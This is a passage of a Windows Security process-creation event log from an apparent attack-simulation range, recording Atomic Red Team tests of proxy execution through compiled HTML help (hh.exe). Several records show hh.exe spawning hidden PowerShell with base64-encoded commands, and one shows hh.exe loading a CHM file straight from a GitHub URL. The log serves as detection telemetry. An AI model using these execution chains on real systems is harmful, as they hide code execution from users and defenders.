07/25/2022 08:06:08 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748663 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x664 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x738 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA== Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:08 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748638 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x738 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "its:C:\Users\Administrator\AppData\Local\Temp\2\Test.chm::/TEMPLATE_SHORTCUT_1.html" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:07 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748615 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x14c8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:06 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748575 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1848 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x17cc Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA== Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:06 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748550 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x17cc New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "its:C:\Users\Administrator\AppData\Local\Temp\2\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:04 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748526 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1220 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -ScriptEngine JScript -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:04 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748512 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1810 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1a10 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA== Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:04 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748507 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1a10 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1cd0 Creator Process Name: C:\Windows\explorer.exe Process Command Line: "C:\Windows\hh.exe" C:\Users\Administrator\AppData\Local\Temp\2\Test.chm Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:01 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748439 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1864 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1e84 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA== Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:01 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748414 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x1e84 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "its:C:\Users\Administrator\AppData\Local\Temp\2\Test.chm" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:06:00 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748389 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1ff0 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -InfoTechStorageHandler its -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:59 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748351 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x8b8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1730 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -EncodedCommand CgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAnACwAJwBIAGkAZABkAGUAbgAnACwAJwAtAE4AbwBQAHIAbwBmAGkAbABlACcALAAnAC0AQwBvAG0AbQBhAG4AZAAnACwAKAAnAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnACAAKwAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABFAG4AdgA6AHcAaQBuAGQAaQByAFwAVABlAG0AcABcAEkAbgB2AG8AawBlAEMASABNAFQAZQBzAHQARwB1AGkAZAAuAHQAeAB0ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAKQAKAA== Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:59 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748323 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: NT AUTHORITY\NETWORK SERVICE Account Name: WIN-HOST-MHAAG-$ Account Domain: WORKGROUP Logon ID: 0x3E4 Target Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Process Information: New Process ID: 0x1730 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1ccc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: "C:\Windows\hh.exe" "C:\Users\Administrator\AppData\Local\Temp\2\Test.chm" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:56 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748297 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x2f8 New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "powershell.exe" & {Invoke-ATHCompiledHelp -HHFilePath $env:windir\hh.exe -CHMFilePath Test.chm} Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:55 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748293 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x15f0 New Process Name: C:\Windows\hh.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0xf40 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:55 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748291 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xf40 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1174 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "cmd.exe" /c "hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm" Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:43 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft Windows security auditing. Type=Information RecordNumber=1748271 Keywords=Audit Success TaskCategory=Process Creation OpCode=Info Message=A new process has been created. Creator Subject: Security ID: WIN-HOST-MHAAG-\Administrator Account Name: Administrator Account Domain: WIN-HOST-MHAAG- Logon ID: 0x75393 Target Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x18b0 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: Mandatory Label\High Mandatory Level Creator Process ID: 0x1650 Creator Process Name: C:\Windows\hh.exe Process Command Line: "C:\Windows\System32\cmd.exe" /c calc.exe Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 07/25/2022 08:05:43 PM LogName=Security EventCode=4688 EventType=0 ComputerName=win-host-mhaag-attack-range-117 SourceName=Microsoft 